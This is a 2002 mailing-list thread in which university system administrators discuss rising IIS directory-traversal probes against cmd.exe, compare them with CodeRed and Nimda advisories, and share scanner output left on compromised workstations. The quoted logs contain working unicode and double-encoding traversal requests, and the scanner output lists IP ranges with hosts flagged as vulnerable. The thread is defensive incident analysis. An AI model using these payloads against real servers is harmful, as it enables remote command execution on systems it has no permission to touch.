[unisog] increasing cmd.exe port 80/tcp probes

Lois Lehman LOIS.LEHMAN at asu.edu
Mon Jun 3 17:08:01 GMT 2002


I have found data left behind on compromised Windows workstations that is
probably related to this activity.  We have received reports that there was
Nimda activity coming from these workstation and could find nothing that
would indicate it was truly Nimda.

In searching two of the compromised computers, data was found in the
Recycler similar to this:

COMMAND:
c:\RECYCLER\s-1-5-21-436374069-261478967-1417001333-1503\new\sfind.exe -uni
149.160.0.0 149.167.255.255 
149.160.22.66 find unicode hole
149.160.22.53 find unicode hole
149.160.22.117 find unicode hole
149.160.22.188 find unicode hole
149.160.22.232 find unicode hole
149.160.22.238 find unicode hole
149.160.22.252 find unicode hole
149.160.22.233 find unicode hole
149.160.22.236 find unicode hole
149.160.22.240 find unicode hole
149.160.23.11 find unicode hole
149.160.23.167 find unicode hole
149.160.24.128 find unicode hole
149.163.50.57 find unicode hole
149.164.63.2 find unicode hole
149.166.76.150 find unicode hole
149.166.88.7 find unicode hole
149.166.231.30 find unicode hole
COMMAND OVER.


COMMAND:
c:\RECYCLER\s-1-5-21-436374069-261478967-1417001333-1503\new\sfind.exe -uni
212.250.238.255 212.250.255.255 
212.250.240.4 find unicode hole
212.250.240.85 find unicode hole
212.250.240.83 find unicode hole
212.250.240.121 find unicode hole
COMMAND OVER.

It appeared that everything else related to this activity had been removed.
If I have a chance to look at another one, I will dig deeper and share to
the list.

Lois Lehman, GSEC
Physical Sciences Computer Support
Dean's Office
College of Liberal Arts & Sciences
Arizona State University
480-965-3139

-----Original Message-----
From: Jeff Anderson-Lee [mailto:jonah at eecs.berkeley.edu]
Sent: Monday, June 03, 2002 9:38 AM
To: unisog at sans.org
Subject: Re: [unisog] increasing cmd.exe port 80/tcp probes


These probing patterns are IIS Directory Traversal probes, but
they are not indicative of any CodeRed or Nimda varient that I am
aware of.  The CERT Advisories list explicit probe patterns for
these which I am familiar with:

http://www.cert.org/advisories/CA-2001-19.html (CodeRed)
http://www.cert.org/incident_notes/IN-2001-09.html (Code Red II)
http://www.cert.org/advisories/CA-2001-26.html (Nimda)

This appears to be something new, attacking the same security hole.
If you can point to information to the contrary, I'd greatly appreciate
it.

Jeff Anderson-Lee
Systems Manager, Digital Library Project
ERL, University of California at Berkeley

> Hello Jeff,
>
> Others have most probably already responded... this pattern indicative 
> of CodeRed.
>
> At 10:04 AM 6/2/2002 -0700, you wrote:
>
>> Starting on Jan 5, 2002 I've been noticing some particular probes
>> appearing regularly in my apache logs.  There are two patterns of
>> note.  The first is a single probe:
>>
>>    "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir"
>>
>> and the second is a pair of probes:
>>
>>    "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir+c:\ HTTP/1.1"
>>    "GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir+c:\ 
>> HTTP/1.1"
>>
>> At first, seeing a new host with these one of these probe patterns was a
>> weekly event, then later about once a day.  However in the past 
>> thirty-six
>> hours I've started to see a sudden rise in the incidence of new hosts
>> scanning with the first pattern:
>>
>> dlp:X.uniweb.net.co [200.24.X.X] - - [31/May/2002:22:39:46 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:136.145.X.X [136.145.X.X] - - [31/May/2002:22:43:07 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.tricornet.com [207.190.X.X] - - [31/May/2002:23:12:43 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.stny.rr.com [24.169.X.X] - - [31/May/2002:23:31:09 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.mfr.com [216.223.X.X] - - [01/Jun/2002:05:50:48 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.losangeles-ics.com [63.68.X.X] - - [01/Jun/2002:05:55:26 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.aplikacie.sk [212.55.X.X] - - [01/Jun/2002:07:51:02 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.globetrotter.net [142.169.X.X] - - [01/Jun/2002:11:51:16 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.encompserv.com [63.160.X.X] - - [01/Jun/2002:14:11:48 -0700] 
>> "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 
>> ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.k12.al.us [216.109.X.X] - - [01/Jun/2002:21:08:52 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:X.atl.client2.attbi.com [24.98.X.X] - - [01/Jun/2002:21:27:15 
>> -0700] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 
>> 404 3234 ((- -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:208.255.X.X [208.255.X.X] - - [01/Jun/2002:21:35:05 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>> dlp:128.173.X.X [128.173.X.X] - - [02/Jun/2002:04:53:12 -0700] "GET 
>> /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 3234 ((- 
>> -> /scripts/..%5c%5c../winnt/system32/cmd.exe))
>>
>>
>> Has anyone else noticed these patterns in their logs?
>> Does anyone know if a virus/worm has been identified with this
>> probing pattern?
>


More information about the unisog mailing list